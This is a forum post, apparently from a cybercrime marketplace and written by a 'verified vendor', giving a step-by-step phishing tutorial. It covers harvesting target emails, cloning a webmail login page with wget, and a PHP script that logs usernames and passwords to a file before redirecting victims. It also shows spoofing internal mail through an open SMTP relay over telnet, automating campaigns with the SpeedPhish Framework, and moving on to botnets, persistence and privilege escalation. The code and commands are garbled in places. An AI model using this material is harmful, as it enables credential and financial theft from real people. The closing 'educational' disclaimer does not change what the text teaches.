What's new

Phishing tuto

Black Stone

Black Stone

Verfied Vendor
Premium User
Dec 6, 2016
Reaction score
United kingdom
Phishing is an attempt to acquire sensitive information by masquerading as a trustworthy entity in the world of electronic communication.

what types of sensitive information?

for example:

credentials as usr / pass
credit cards
identity (documents-license)
health information
accaunt steam, bitcoin wallet etc.

3 types of attacks usual

Phishing - normally whit a specific purpose and to receive money

Spear phishing - specific targets or groups

whaling - specific to a single person

why phish?

why implement a phish attack if there are other types of attacks?

because it works! attacks people not computers (there are training and protocols but people are lazy and continue to click links)

phishing process

1. reconnaissance (eg. E-mail, position in the company, systems, log-in page etc.)
- Inf gathering
- Large companies potentially aquistano email on black market
-start to test for correct future attacks
- Active and passibo info gathering for vulnerabilities

tools for reconnaissance:
maltengo radium
net glub
the havarest

2. setup and deployment (organization systems useful to our goal
domain registration
mass mailer
open relays for doamin targhet

Web server setup
website cloning
web application development

malicuis attachments / malware payloads (beef)
browser exploits

head around before submitting, will not have a second chance

3. collect answers / organize

head credentials
do other phish attacks from trusted acc
connettili a botnet / shells and go in persistence
increases your privileges


4. draw up a report
do it for exercise and to keep everything neat


let's get to work

we identify our goal and we carry the full step one

clone the website for hosting:
wget --recursive --level = 1 --convert-links --page-requisites URL.ph/mail/

start fixing the cloned site:
sudo mv URL.ph/mail / var / www / html
sudo vim /var/www/html/mail/index.html

this attack to be functional we need to record usr and pass the various users, we can write a short php script to collect all the variables (as usr / pass)
<? Php
$ User = & _POST ['_ user'];
$ Pass = & _POST ['_ pass'];

$ F = fopen ("collect.txt", "a");
fwrite ($ f, "$ user: $ pass \ n");
fclose ();

header ("Location: htp: //url.ph/mail/");
die ();

$ User = & _POST ['_ user'];
$ Pass = & _POST ['_ pass'];

record username and password

$ F = fopen ("collect.txt", "a");
fwrite ($ f, "$ user: $ pass \ n");
fclose ();

We save them in collect.txt

header ("Location: htp: //url.ph/mail/");
die ();
Send them back to the original site

then for how we set the script copy of the Web Site the script would not work, so we have to go in and change the site cloanato form.
<Form> Original

<Form name = "form" action = "index.html" method = "post">

running form

<Form name = "form" action = "form.php" method = "post">

-------------------------------------------------- -

so once you created the site, and found a way to collect the data we need to set up a server and finally test our attacks.

so here we have the right set of permissions for our web paggina
sudo chown www-data: www-data / var / www / -R

service apache2 restart

now testing the paggina

we created let's check

cat /var/www/mail/creds.txt

for example: lol / usr iMbid / pass

-------------------------------------------------- ---

once we tested this function back to the stage of recognition
-mail server

-We need to understand how to send phishing e-mail
-during a vulnerability scan will find that the mail server in an open relay that will allow us to play as a particular user.

then using telnet build the email to our goal.
in which we play as a known user and Privileggi that chide another known user and Privileggi to test the performance of a given nueve private section



url.com 25 telnet (port)
ehlo url.com
mail from: bjenius@URL.com
Mail to: rbourne@URL.com
subject: Webmail Site Update
We are currently testing a new performance configuration for the webmail site, please test the site change by visiting: url.com/mail (our url to craft)



attack tools - make the job easier

-phishing frenzy

September the best, complete

Beef is normally used as part of the attack to find more information

phishing frenzy similar to the set and meta brows very nice


how do I make this work are pigro- simpler and AUTOMATIC

beef restful api
recon-cli comand line - call bees
set - seautomate
-python, perl, & Bash

recommended in 2015

speedphish Framework - SPF
-passa for all starting points of work
- Automatic tasks useful to make a phishing attack
-written in python
-complete or partial automation
-can be configured with external tools if available

current powers

- Collects email addresses from inaternet
- Setup & host website
-manda phishing e-mail to our goal
- Creates reports

We deepen this program:
install it
first cd / SPF-master
take a look at Requirements.txt

cd / spf
./spf.py -h (options)

important to take a squardo

the suggestion is to launch the first --test and check all the work and it's perfect

let's take a look at the config:

we can set the server that sends email


if we try to run

./spf.py --test -d example.com

It will tell us that is using settings in default.cfg (we can also have more file.cfg)

He is trying to find email linked website
at the end of the process we will tell us that, for example, were found 41 emails related to our goal.

as a result will start to make the phishing webserver looking
It will mount the template
we will e-mail template
then begin to send email
Finally, monitor the activities of the phishing website
We see all activities on our template and pressing CTRL-C will stop the web server generating the report.
of course we have not collected anything should not stop the webserver.

this guide for educational and information, anyone who shares it does in the pure spirit of education.

i'm try to speach eng, if i fail plz help me to let more precise